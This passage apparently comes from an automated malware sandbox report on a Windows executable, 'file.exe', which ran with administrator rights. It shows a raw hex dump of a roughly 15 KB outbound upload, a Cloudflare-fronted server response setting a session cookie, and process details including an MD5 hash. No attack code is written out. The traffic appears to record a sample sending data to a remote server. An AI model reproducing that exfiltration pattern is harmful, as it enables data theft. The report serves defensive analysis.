                                                                                        Data Ascii: Q^bE{%chSrx?2hW:ew0#>3rl~%8:?QlaYW0tv.Z-LB9>)T/(/S^!RoFiabN8U|o)S;PUY-cG?tH,T,eJZPUg\ uoW&wr?DzWj*9YW~
                                                                                        2024-11-23 12:57:48 UTC15331OUTData Raw: 31 09 36 36 a4 59 67 0c f5 fa 6c 16 a0 d4 0a 92 36 61 48 98 a3 05 ea 43 67 86 ab 9b 21 2a 0e 91 8c e1 b9 be 9b 9f 6a f9 ba 30 ef 3b c8 1f ea 5d 1c f0 f3 0c 9f eb 5d ad da 7b 5a 2b 68 f6 33 d9 6f 16 43 1f 32 e7 c4 64 9d 6a a4 d3 fd 5e f9 b3 b9 77 fd d9 3c 83 b1 59 5d 0a 4b 9d f8 9f da c0 5e e2 17 f4 38 db 07 e2 d3 c4 28 e3 10 ab db 86 3c 65 3e ff a1 b0 f4 77 b0 fb b8 f8 c7 89 f5 37 28 e0 36 3c 38 c0 be 0e e4 49 d9 d5 91 33 8d b3 1b 8e f4 a1 fe 70 56 3b 0b 81 02 e1 fe cb 0b d7 36 22 dc 6f 03 bd 52 20 28 08 dc 87 3d 27 11 f0 c0 4e 17 78 e0 0f 98 3f 2c 70 0b 8f ab ae d6 3a 16 ce 49 80 c8 72 19 b0 42 e0 f7 ed 9c 15 04 fd a8 d5 98 a5 94 f9 b9 07 9e 8f fd ec cd 96 ef 39 57 de 28 2e 6f b2 62 46 3a 27 7e b8 08 0c cf 10 68 4f 00 eb 7e 34 ec bc 0b 64 ec 71 f8 df 71
                                                                                        Data Ascii: 166Ygl6aHCg!*j0;]]{Z+h3oC2dj^w<Y]K^8(<e>w7(6<8I3pV;6"oR (='Nx?,p:IrB9W(.obF:'~hO~4dqq
                                                                                        2024-11-23 12:57:51 UTC1023INHTTP/1.1 200 OK
                                                                                        Date: Sat, 23 Nov 2024 12:57:51 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Set-Cookie: PHPSESSID=v2kic98gfm2kotssi4m84835af; expires=Wed, 19-Mar-2025 06:44:28 GMT; Max-Age=9999999; path=/
                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        cf-cache-status: DYNAMIC
                                                                                        vary: accept-encoding
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=n3UdAcmuNd989qOeIinlM%2F4sMLBwgyxJeRxg6ISCIUO3w6pFoQv9BnTnVMO6XdzAPwx4sANiQCKqku1MtSizwCnHc%2BBO%2ByLKFOPwqdzhBZqmmq%2BhrKSSNfFfiday6VOElGXFFLA%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8e7153bc2f53729b-EWR
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1796&sent=201&recv=593&lost=0&retrans=0&sent_bytes=2844&recv_bytes=573933&delivery_rate=1566523&cwnd=249&unsent_bytes=0&cid=aa9f649dc20f200d&ts=3642&x=0"


                                                                                        Statistics

                                                                                        CPU Usage

                                                                                        Click to jump to process

                                                                                        Memory Usage

                                                                                        Click to jump to process

                                                                                        High Level Behavior Distribution

                                                                                        Click to dive into process behavior distribution

                                                                                        System Behavior

                                                                                        General

                                                                                        Target ID:0
                                                                                        Start time:07:57:29
                                                                                        Start date:23/11/2024
                                                                                        Path:C:\Users\user\Desktop\file.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Users\user\Desktop\file.exe"
                                                                                        Imagebase:0x960000
                                                                                        File size:1'852'416 bytes
                                                                                        MD5 hash:44EB876D74E66BC5879D4AC1B636EAF1
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:low
                                                                                        Has exited:true

                                                                                        Disassembly

                                                                                        No disassembly